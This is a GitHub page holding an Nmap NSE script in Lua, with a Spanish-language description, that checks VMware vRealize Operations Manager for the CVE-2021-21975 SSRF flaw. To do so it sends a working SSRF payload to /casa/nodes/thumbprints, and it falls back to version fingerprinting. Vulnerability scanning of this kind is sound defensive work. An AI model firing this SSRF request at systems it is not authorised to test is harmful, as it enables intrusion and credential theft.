-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathcve-2021-21975.nse
103 lines (90 loc) · 4.42 KB
/
cve-2021-21975.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
description = [[
VMware vRealize Operations Manager CVE-2021-21975 SSRF Vulnerability - Check
Este script de Nmap busca verificar la vulnerabilidad CVE-2021-21975 en la siguiente ruta
"/casa/nodes/thumbprints" mediante una solicitud POST e interpretando la
respuesta HTTP 200. Si se encuentran las palabras "vRealize Operations Manager", "thumbprint" y "address"
significa que vRealize Operations Manager es vulnerable a SSRF.
References:
https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
https://www.vmware.com/security/advisories/VMSA-2021-0004.html
]]
---
-- @usage
-- nmap -p443 --script CVE-2021-21975.nse <target>
-- @output
-- PORT STATE SERVICE
-- 443/tcp open https
-- | CVE-2021-21975:
-- | VULNERABLE:
-- | VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2021-21975
-- | Risk factor: HIGH CVSS: 8.6
-- | Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
-- | vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
-- | Disclosure date: 2021-03-30
-- | References:
-- | https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
-- |_ https://www.vmware.com/security/advisories/VMSA-2021-0004.html
author = "Edgar Salazar <edgar.salazar@guayoyo.io>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit"}
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "VMware vRealize Operations Manager 7.0.0, 7.5.0, 8.0.0, 8.0.1, 8.1.0, 8.1.1, 8.2.0, 8.3.0 - SSRF",
state = vulns.STATE.NOT_VULN,
risk_factor = "HIGH",
scores = {
CVSS = "8.6",
},
IDS = { CVE = 'CVE-2021-21975' },
description = [[
Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the
vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
]],
references = {
'https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975',
'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'
},
dates = {
disclosure = {year = '2021', month = '03', day = '30'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local uri = "/casa/nodes/thumbprints"
local PAYLOAD_JSON = [=[["127.0.0.1:443/ui/"]]=]
local options = {header={}}
options["header"]["Host"] = 'action'
options["header"]["Content-Type"] = 'application/json'
options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
vuln.state = vulns.STATE.NOT_VULN
local response = http.post(host, port, uri, options, nil, PAYLOAD_JSON)
if response.status == 200 and
string.find(response.body, "vRealize Operations Manager") and
string.find(response.body, "thumbprint") and
string.find(response.body, "address") then
vuln.state = vulns.STATE.EXPLOIT
else
uri = "/ui/login.action"
options = {header={}}
options["header"]["Host"] = 'action'
options["header"]["Accept"] = 'text/html,application/xhtml+xml,application/xml'
options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
response = http.get(host, port, uri, options)
if response.status == 200 and (
string.find(response.body, "version=7.0.0") or string.find(response.body, "version=7.5.0") or
string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.0.1") or
string.find(response.body, "version=8.0.0") or string.find(response.body, "version=8.1.0") or
string.find(response.body, "version=8.1.1") or string.find(response.body, "version=8.2.0") or
string.find(response.body, "version=8.3.0")) then
vuln.state = vulns.STATE.LIKELY_VULN
end
end
return report:make_output (vuln)
end